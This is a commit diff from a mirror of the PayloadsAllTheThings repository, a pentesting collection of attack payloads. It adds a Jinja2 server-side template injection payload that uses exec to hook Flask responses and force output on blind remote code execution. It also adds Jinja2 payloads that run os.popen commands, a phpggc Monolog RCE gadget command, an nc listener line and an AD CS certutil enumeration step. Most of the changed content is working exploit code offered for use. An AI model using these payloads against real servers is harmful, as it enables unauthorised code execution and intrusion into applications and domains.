mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Blind SSTI Jinja
This commit is contained in:
parent
444d8ad169
commit
4ed3e3b6b9
@ -133,6 +133,7 @@ Also called `"PHP POP Chains"`, they can be used to gain RCE on the system.
|
||||
|
||||
```powershell
|
||||
phpggc monolog/rce1 'phpinfo();' -s
|
||||
phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini
|
||||
```
|
||||
|
||||
## PHP Phar Deserialization
|
||||
|
@ -2225,7 +2225,7 @@ secretsdump.py -k -no-pass target.lab.local
|
||||
* Find ADCS Server
|
||||
* `crackmapexec ldap domain.lab -u username -p password -M adcs`
|
||||
* `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
|
||||
* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`
|
||||
* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump`
|
||||
|
||||
#### ESC1 - Misconfigured Certificate Templates
|
||||
|
||||
|
@ -9,7 +9,7 @@ You can also contribute with a :beers: IRL, or using the sponsor button
|
||||
[![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo)
|
||||
[![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/)
|
||||
|
||||
An alternative display version is available at https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/.
|
||||
An alternative display version is available at [PayloadsAllTheThingsWeb](https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/).
|
||||
|
||||
<p align="center">
|
||||
<img src="https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/.github/banner.png">
|
||||
|
@ -43,6 +43,7 @@
|
||||
- [Jinja2 - Read remote file](#jinja2---read-remote-file)
|
||||
- [Jinja2 - Write into remote file](#jinja2---write-into-remote-file)
|
||||
- [Jinja2 - Remote Code Execution](#jinja2---remote-code-execution)
|
||||
- [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)
|
||||
- [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
|
||||
- [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
|
||||
- [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
|
||||
@ -496,15 +497,30 @@ Listen for connection
|
||||
nc -lnvp 8000
|
||||
```
|
||||
|
||||
#### Jinja2 - Forcing output on blind RCE
|
||||
|
||||
You can import Flask functions to return an output from the vulnerable page.
|
||||
|
||||
```py
|
||||
{{
|
||||
x.__init__.__builtins__.exec("from flask import current_app, after_this_request
|
||||
@after_this_request
|
||||
def hook(*args, **kwargs):
|
||||
from flask import make_response
|
||||
r = make_response('Powned')
|
||||
return r
|
||||
")
|
||||
}}
|
||||
```
|
||||
|
||||
|
||||
#### Exploit the SSTI by calling os.popen().read()
|
||||
|
||||
These payloads are context-free, and do not require anything, except being in a jinja2 Template object:
|
||||
|
||||
```python
|
||||
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
|
||||
|
||||
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
|
||||
|
||||
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
|
||||
```
|
||||
|
||||
@ -512,9 +528,7 @@ We can use these shorter payloads (this is the shorter payloads known yet):
|
||||
|
||||
```python
|
||||
{{ cycler.__init__.__globals__.os.popen('id').read() }}
|
||||
|
||||
{{ joiner.__init__.__globals__.os.popen('id').read() }}
|
||||
|
||||
{{ namespace.__init__.__globals__.os.popen('id').read() }}
|
||||
```
|
||||
|
||||
@ -1092,3 +1106,4 @@ layout template:
|
||||
* [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/)
|
||||
* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
|
||||
* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)
|
||||
* [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw)
|
Loading…
Reference in New Issue
Block a user